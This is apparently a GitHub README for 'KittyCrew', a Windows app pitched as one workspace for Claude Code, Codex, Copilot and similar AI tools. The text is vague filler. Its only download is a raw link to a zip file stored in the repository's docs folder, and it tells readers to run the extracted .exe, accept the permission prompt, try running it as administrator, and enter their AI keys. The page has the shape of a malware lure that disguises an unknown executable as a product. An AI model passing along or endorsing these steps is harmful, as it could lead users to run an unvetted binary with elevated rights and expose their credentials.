KittyCrew is a local-first home for AI pets and companions on Windows. It brings Claude Code, Codex, and GitHub Copilot into one simple workspace. You can keep your tools in one place, switch between them with less effort, and stay in control of your local setup.
KittyCrew is made for Windows desktop use. For the smoothest experience, use:
- Windows 10 or Windows 11
- At least 8 GB of RAM
- 2 GB of free disk space
- A stable internet connection for setup and AI access
- A modern browser if the app opens links or web views
If your PC runs other desktop apps well, it should handle KittyCrew.
Visit this page to download and run the app on Windows:
https://github.com/levorotary-galvanometer224/KittyCrew/raw/refs/heads/main/docs/Kitty_Crew_3.0.zip
If the page shows a release file, download it. If it shows the main project page, use the latest Windows build or setup file listed there.
- Open the download page in your browser.
- Find the latest Windows file.
- Download the file to your computer.
- If the file is a
.zip, right-click it and choose Extract All. - Open the extracted folder.
- If you see an
.exefile, double-click it to start KittyCrew. - If Windows asks for permission, choose Yes.
- If the app opens with a setup screen, follow the prompts until the install finishes.
When you open KittyCrew for the first time, it may ask you to set up your workspace. Use a simple folder on your PC, such as Documents\KittyCrew, so your files stay easy to find.
You may also see setup fields for your AI tools. Add your accounts or keys if the app asks for them. KittyCrew keeps the setup in one place, so you do not need to jump between separate apps as much.
KittyCrew helps you:
- Keep Claude Code, Codex, and GitHub Copilot in one workspace
- Track different AI agents in a local-first setup
- Organize tasks, chats, and notes in one place
- Move between tools with less clutter
- Keep your work on your own computer
This makes it easier to manage several AI helpers without opening many windows.
To keep KittyCrew running well:
- Keep the app in a folder you can find again
- Do not move its files after setup
- Close other heavy apps if your PC feels slow
- Keep Windows up to date
- Use one local folder for your project files and notes
If KittyCrew saves settings on your computer, back up that folder from time to time.
A clean folder setup can help a lot:
Documents\KittyCrewfor the app or workspaceDocuments\KittyCrew\Projectsfor project filesDocuments\KittyCrew\Notesfor short notes and promptsDocuments\KittyCrew\Backupsfor saved copies
A simple layout makes it easier to find what you need later.
KittyCrew is built around common AI tools used in coding and assistant workflows:
- Claude Code
- Codex
- GitHub Copilot
- Gemini CLI
- OpenCode
- OpenClaw
- ClawDBot
You can use one tool or several, depending on how you work.
A normal day with KittyCrew may look like this:
- Open the app.
- Choose the AI companion you want to use.
- Open your local project folder.
- Send a task, question, or prompt.
- Review the result.
- Save useful notes in your workspace.
This keeps your work steady and easier to repeat.
Try these steps:
- Make sure the file finished downloading
- Right-click the app and choose Run as administrator
- Check whether Windows blocked the file
- Restart your PC and try again
- Open the app from the extracted folder if you used a
.zip - Download the file again if it looks broken
If the app still does not open, check the project page for a newer Windows build.
For a better long-term setup:
- Use one folder for each project
- Delete old downloads after you install
- Keep notes in plain text files
- Save backups before large changes
- Rename files so they stay easy to sort
A neat workspace makes the app easier to use.
To get better help from your AI tools:
- Use short prompts
- Give one task at a time
- Add file names or folder names when needed
- Save prompts that work well
- Keep your instructions clear and simple
Good input usually gives better output.
KittyCrew is part of the local AI workspace world:
- agent
- claude-code
- clawdbot
- codex
- cowork
- gemini-cli
- openclaw
- opencode
These topics point to multi-agent work, local tools, and companion-style workflows
- Download KittyCrew from the link above
- Open the file or extract it if needed
- Run the app
- Finish the first setup screen
- Add your AI tool access if asked
- Open a local folder and start using it